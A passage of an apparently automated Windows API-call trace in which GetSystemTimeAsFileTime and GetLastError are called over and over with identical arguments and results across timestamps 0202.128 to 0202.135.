returned 0x0 [0202.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.128] GetLastError () returned 0x0 [0202.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.128] GetLastError () returned 0x0 [0202.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.128] GetLastError () returned 0x0 [0202.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.128] GetLastError () returned 0x0 [0202.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.128] GetLastError () returned 0x0 [0202.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.128] GetLastError () returned 0x0 [0202.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.128] GetLastError () returned 0x0 [0202.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.128] GetLastError () returned 0x0 [0202.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.128] GetLastError () returned 0x0 [0202.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.128] GetLastError () returned 0x0 [0202.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.128] GetLastError () returned 0x0 [0202.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.128] GetLastError () returned 0x0 [0202.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.128] GetLastError () returned 0x0 [0202.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.128] GetLastError () returned 0x0 [0202.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.128] GetLastError () returned 0x0 [0202.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.129] GetLastError () returned 0x0 [0202.129] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.129] GetLastError () returned 0x0 [0202.129] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.129] GetLastError () returned 0x0 [0202.129] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.129] GetLastError () returned 0x0 [0202.129] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.129] GetLastError () returned 0x0 [0202.129] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.129] GetLastError () returned 0x0 [0202.129] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.129] GetLastError () returned 0x0 [0202.129] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.129] GetLastError () returned 0x0 [0202.129] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.129] GetLastError () returned 0x0 [0202.129] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.129] GetLastError () returned 0x0 [0202.129] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.129] GetLastError () returned 0x0 [0202.129] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.129] GetLastError () returned 0x0 [0202.129] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.129] GetLastError () returned 0x0 [0202.129] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.129] GetLastError () returned 0x0 [0202.129] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.129] GetLastError () returned 0x0 [0202.129] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.129] GetLastError () returned 0x0 [0202.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.130] GetLastError () returned 0x0 [0202.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.130] GetLastError () returned 0x0 [0202.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.130] GetLastError () returned 0x0 [0202.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.130] GetLastError () returned 0x0 [0202.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.130] GetLastError () returned 0x0 [0202.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.130] GetLastError () returned 0x0 [0202.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.130] GetLastError () returned 0x0 [0202.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.130] GetLastError () returned 0x0 [0202.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.130] GetLastError () returned 0x0 [0202.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.130] GetLastError () returned 0x0 [0202.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.130] GetLastError () returned 0x0 [0202.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.130] GetLastError () returned 0x0 [0202.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.130] GetLastError () returned 0x0 [0202.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.130] GetLastError () returned 0x0 [0202.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.130] GetLastError () returned 0x0 [0202.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.130] GetLastError () returned 0x0 [0202.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.131] GetLastError () returned 0x0 [0202.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.131] GetLastError () returned 0x0 [0202.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.131] GetLastError () returned 0x0 [0202.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.131] GetLastError () returned 0x0 [0202.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.131] GetLastError () returned 0x0 [0202.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.131] GetLastError () returned 0x0 [0202.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.131] GetLastError () returned 0x0 [0202.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.131] GetLastError () returned 0x0 [0202.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.131] GetLastError () returned 0x0 [0202.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.131] GetLastError () returned 0x0 [0202.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.131] GetLastError () returned 0x0 [0202.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.131] GetLastError () returned 0x0 [0202.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.131] GetLastError () returned 0x0 [0202.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.131] GetLastError () returned 0x0 [0202.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.131] GetLastError () returned 0x0 [0202.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.132] GetLastError () returned 0x0 [0202.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.132] GetLastError () returned 0x0 [0202.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.132] GetLastError () returned 0x0 [0202.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.132] GetLastError () returned 0x0 [0202.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.132] GetLastError () returned 0x0 [0202.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.132] GetLastError () returned 0x0 [0202.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.132] GetLastError () returned 0x0 [0202.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.132] GetLastError () returned 0x0 [0202.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.132] GetLastError () returned 0x0 [0202.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.132] GetLastError () returned 0x0 [0202.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.132] GetLastError () returned 0x0 [0202.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.132] GetLastError () returned 0x0 [0202.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.132] GetLastError () returned 0x0 [0202.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.132] GetLastError () returned 0x0 [0202.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.132] GetLastError () returned 0x0 [0202.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.132] GetLastError () returned 0x0 [0202.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.133] GetLastError () returned 0x0 [0202.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.133] GetLastError () returned 0x0 [0202.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.133] GetLastError () returned 0x0 [0202.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.133] GetLastError () returned 0x0 [0202.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.133] GetLastError () returned 0x0 [0202.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.133] GetLastError () returned 0x0 [0202.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.133] GetLastError () returned 0x0 [0202.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.133] GetLastError () returned 0x0 [0202.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.133] GetLastError () returned 0x0 [0202.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.133] GetLastError () returned 0x0 [0202.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.133] GetLastError () returned 0x0 [0202.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.133] GetLastError () returned 0x0 [0202.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.133] GetLastError () returned 0x0 [0202.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.133] GetLastError () returned 0x0 [0202.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.133] GetLastError () returned 0x0 [0202.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.133] GetLastError () returned 0x0 [0202.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.134] GetLastError () returned 0x0 [0202.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.134] GetLastError () returned 0x0 [0202.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.134] GetLastError () returned 0x0 [0202.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.134] GetLastError () returned 0x0 [0202.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.134] GetLastError () returned 0x0 [0202.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.134] GetLastError () returned 0x0 [0202.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.134] GetLastError () returned 0x0 [0202.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.134] GetLastError () returned 0x0 [0202.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.134] GetLastError () returned 0x0 [0202.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.134] GetLastError () returned 0x0 [0202.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.134] GetLastError () returned 0x0 [0202.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.134] GetLastError () returned 0x0 [0202.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.134] GetLastError () returned 0x0 [0202.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.134] GetLastError () returned 0x0 [0202.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.134] GetLastError () returned 0x0 [0202.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.135] GetLastError () returned 0x0 [0202.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.135] GetLastError () returned 0x0 [0202.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.135] GetLastError () returned 0x0 [0202.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.135] GetLastError () returned 0x0 [0202.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.135] GetLastError () returned 0x0 [0202.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.135] GetLastError () returned 0x0 [0202.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.135] GetLastError () returned 0x0 [0202.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.135] GetLastError () returned 0x0 [0202.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.135] GetLastError () returned 0x0 [0202.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.135] GetLastError () returned 